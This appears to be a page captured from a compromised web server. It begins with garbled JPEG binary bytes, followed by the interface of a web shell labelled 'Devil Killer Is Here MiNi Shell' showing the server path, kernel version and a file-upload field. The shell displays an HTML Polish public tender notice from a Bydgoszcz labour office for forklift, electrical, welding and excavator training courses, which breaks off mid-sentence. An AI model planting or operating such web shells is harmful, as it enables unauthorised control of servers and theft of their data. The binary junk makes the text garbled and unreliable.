JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230713/0030441101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Część nr 1-„Wózki jezdniowe podnośnikowe”<br/>Część nr 2-„Uprawnienia elektryczne – grupa I”<br/>Część nr 3-„Spawanie blach i rur spoinami pachwinowymi metodą MAG i TIG”<br/>Część nr 4-„Operator koparkoładowarki” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Urząd Pracy w Bydgoszczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092534282</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Toruńska 147</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-950</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523604354</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">523604341</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia-publiczne@pup.bydgoszcz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.pup.bydgoszcz.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> promocja zatrudnienia, łagodzenie skutków bezrobocia, aktywizacja zawodowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Część nr 1-„Wózki jezdniowe podnośnikowe”<br/>Część nr 2-„Uprawnienia elektryczne – grupa I”<br/>Część nr 3-„Spawanie blach i rur spoinami pachwinowymi metodą MAG i TIG”<br/>Część nr 4-„Operator koparkoładowarki” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-197c9a3c-1f13-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00304411</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00037745/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługa szkoleniowa: 1.Wózki jezdniowe podnośnikowe; 2. Uprawnienia elektryczne-grupa I; 3. Spawanie blach i rur spoinami pachwinowymi metodą MAG i TIG; 4. Operator koparkoładowarki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie dla Kujaw i Pomorza 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-197c9a3c-1f13-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu: 1) Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl 2) poczty elektronicznej – e-mail: zamowienia-publiczne@ pup.bydgoszcz.pl z zastrzeżeniem, że oferta musi być złożona przy użyciu Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">I.1.W postępowaniu o udzielenie zamówienia publicznego komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu:1)Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl 2)poczty elektronicznej – e-mail: zamowienia-publiczne@ pup.bydgoszcz.pl z zastrzeżeniem, że oferta musi być złożona przy użyciu Platformy e-Zamówienia.2.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.3.Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa RM z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (dalej rozporządzenie).II.1.Wykonawca składa ofertę przy pomocy „Formularza ofertowego” udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”. Zamawiający nie posługuje się interaktywnym formularzem ofertowym generowanym z Platformy e-Zamówienia, lecz udostępnił własny formularz ofertowy.2.Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików.3.Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.4.Formularz ofertowy podpisuje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Rekomendowanym wariantem podpisu jest typ wewnętrzny. Pozostałe dokumenty wchodzące w skład oferty lub składane wraz z ofertą, które są zgodne z ustawą Pzp lub rozporządzeniem opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby opatrzone podpisem typu zewnętrznego lub wewnętrznego.5.Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.III.1.Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”).2.Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.3.Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.4.Zamawiający dopuszcza również komunikację wykonawcy i zamawiającego za pomocą poczty elektronicznej na adres e-mail: zamowienia-publiczne@ pup.bydgoszcz.pl, w tym możliwość składania dokumentów elektronicznych (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: 1. Administratorem Pani/Pana danych osobowych jest Powiatowy Urząd Pracy w Bydgoszczy z siedzibą przy ul. Toruńskiej 147, 85-950 Bydgoszcz. 2. W sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych - e-mail: iod@pup.bydgoszcz.pl 3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego. 4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp. 5. Pani/Pana dane osobowe będą przechowywane przez okres 5 lat licząc od stycznia roku następnego po zakończeniu realizacji umowy lub unieważnieniu postępowania, z zastrzeżeniem że w przypadku współfinansowania zamówienia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Plus (projekt „Podniesienie aktywności zawodowej klientów publicznych służb zatrudnienia – PUP w Bydgoszczy (I)”, program Fundusze Europejskie dla Kujaw i Pomorza 2021-2027), Zamawiający zobowiązany jest do przechowywania dokumentacji przez okres 5 lat liczonych od 31 grudnia roku, w którym Instytucja Pośrednicząca zatwierdzi końcowy wniosek o płatność. Okresy te dotyczą również wykonawców, którzy złożyli oferty i nie zostały one uznane jako najkorzystniejsze (nie zawarto z tymi wykonawcami umowy). 6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w niniejszym postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp. 7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO. 8. Posiada Pani/Pan: - na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; - na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu oraz jego załączników); - na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO. 9. Nie przysługuje Pani/Panu: - w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; - prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; - na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PUP-CP-2410-1/AF/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa przeprowadzenia dwóch szkoleń grupowych dla osób bezrobotnych i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Bydgoszczy pn. „Wózki jezdniowe podnośnikowe”. Liczba uczestników wszystkich szkoleń (całego zamówienia) – do 20 uczestników. Liczba uczestników jednego szkolenia wynosi do 10 uczestników. Szkolenia przeznaczone są dla osób aktywizowanych przez Powiatowy Urząd Pracy w Bydgoszczy. Program szkolenia obejmuje 96 godzin zegarowych przeprowadzonych w 12 dni. Zamawiający wymaga przeprowadzenia zajęć praktycznych w wymiarze co najmniej 32 godzin zegarowych w zakresie obsługi wózków jezdniowych podnośnikowych wraz z bezpieczną wymianą butli gazowej. Prognozowane miesiące rozpoczęcia szkoleń w 2023 r.: wrzesień (I szkolenie), październik (II szkolenie). Zamawiający zastrzega sobie prawo zmiany prognozowanego terminu rozpoczęcia szkoleń o maksymalnie 1 miesiąc w przypadku trudności ze skompletowaniem grupy osób bezrobotnych i poszukujących pracy, będących odbiorcami przedmiotu zamówienia. Szczegółowe terminy realizacji szkoleń zostaną ustalone z wykonawcą po wyborze najkorzystniejszej oferty, a przed zawarciem umowy w sprawie zamówienia publicznego. Czas trwania jednego szkolenia nie może przekroczyć 12 dni na realizację zajęć objętych programem oraz 4 tygodni od zakończenia szkolenia na przeprowadzenie egzaminu zewnętrznego. Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 1a do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega zastosowanie prawa opcji. Przewidywana liczba uczestników jednego szkolenia wynosi 10 osób. W przypadku gdy z powodu braku chętnych osób bezrobotnych i poszukujących pracy (sytuacja niezawiniona po stronie zamawiającego) nie uda się skompletować grupy 10 uczestników, szkolenie będzie zrealizowane (przy zachowaniu niezmienionego kosztu szkolenia za jednego uczestnika), a wykonawca otrzyma zapłatę za liczbę uczestników, która zostanie skierowana na szkolenie i wskazana w suplemencie, stanowiącym załącznik nr 2 do umowy w sprawie zamówienia publicznego. Zastrzega się jednocześnie, że jeżeli ze względu na brak chętnych osób bezrobotnych i poszukujących pracy nie uda się skompletować grupy uczestników szkolenia wynoszącej co najmniej 5 osób, wykonawcy przysługuje prawo odstąpienia od umowy. Wykonawcy nie będzie przysługiwało żadne roszczenie z tego tytułu w stosunku do zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w wysokości nie więcej niż 50 % zamówienia podstawowego, tzn. możliwość przeprowadzenia dodatkowo 1 szkolenia dla maksymalnie 10 uczestników, na warunkach wskazanych w opisie przedmiotu zamówienia i przy zachowaniu niezmienionego kosztu szkolenia za jednego uczestnika zgodnie z ofertą wybranego wykonawcy. Udzielenie zamówienia nastąpi poprzez zawarcie odrębnej umowy. Czas trwania szkolenia nie może przekroczyć 12 dni na realizację zajęć objętych programem (96 godzin zegarowych) oraz 4 tygodni od zakończenia szkolenia na przeprowadzenie egzaminu zewnętrznego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wg kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe kadry dydaktycznej (trenera/instruktora/wykładowcy) w prowadzeniu szkolenia wózki jezdniowe podnośnikowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa przeprowadzenia dwóch szkoleń grupowych dla osób bezrobotnych i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Bydgoszczy pn. „Uprawnienia elektryczne – grupa I”. Liczba uczestników wszystkich szkoleń (całego zamówienia) – do 20 uczestników. Liczba uczestników jednego szkolenia wynosi do 10 uczestników. Szkolenia przeznaczone są dla osób aktywizowanych przez Powiatowy Urząd Pracy w Bydgoszczy. Program szkolenia dotyczy prac na stanowisku eksploatacji i obejmuje 40 godzin zegarowych przeprowadzonych w 5 dni. Zamawiający wymaga przeprowadzenia zajęć praktycznych w wymiarze co najmniej 24 godzin zegarowych. Prognozowane miesiące rozpoczęcia szkoleń w 2023 r.: wrzesień (I szkolenie), październik (II szkolenie). Zamawiający zastrzega sobie prawo zmiany prognozowanego terminu rozpoczęcia szkoleń o maksymalnie 1 miesiąc w przypadku trudności ze skompletowaniem grupy osób bezrobotnych i poszukujących pracy, będących odbiorcami przedmiotu zamówienia. Szczegółowe terminy realizacji szkoleń zostaną ustalone z wykonawcą po wyborze najkorzystniejszej oferty, a przed zawarciem umowy w sprawie zamówienia publicznego. Czas trwania jednego szkolenia nie może przekroczyć 5 dni na realizację zajęć objętych programem oraz 4 tygodni od zakończenia szkolenia na przeprowadzenie egzaminu zewnętrznego. Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 1b do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega zastosowanie prawa opcji. Przewidywana liczba uczestników jednego szkolenia wynosi 10 osób. W przypadku gdy z powodu braku chętnych osób bezrobotnych i poszukujących pracy (sytuacja niezawiniona po stronie zamawiającego) nie uda się skompletować grupy 10 uczestników, szkolenie będzie zrealizowane (przy zachowaniu niezmienionego kosztu szkolenia za jednego uczestnika), a wykonawca otrzyma zapłatę za liczbę uczestników, która zostanie skierowana na szkolenie i wskazana w suplemencie, stanowiącym załącznik nr 2 do umowy w sprawie zamówienia publicznego. Zastrzega się jednocześnie, że jeżeli ze względu na brak chętnych osób bezrobotnych i poszukujących pracy nie uda się skompletować grupy uczestników szkolenia wynoszącej co najmniej 5 osób, wykonawcy przysługuje prawo odstąpienia od umowy. Wykonawcy nie będzie przysługiwało żadne roszczenie z tego tytułu w stosunku do zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający 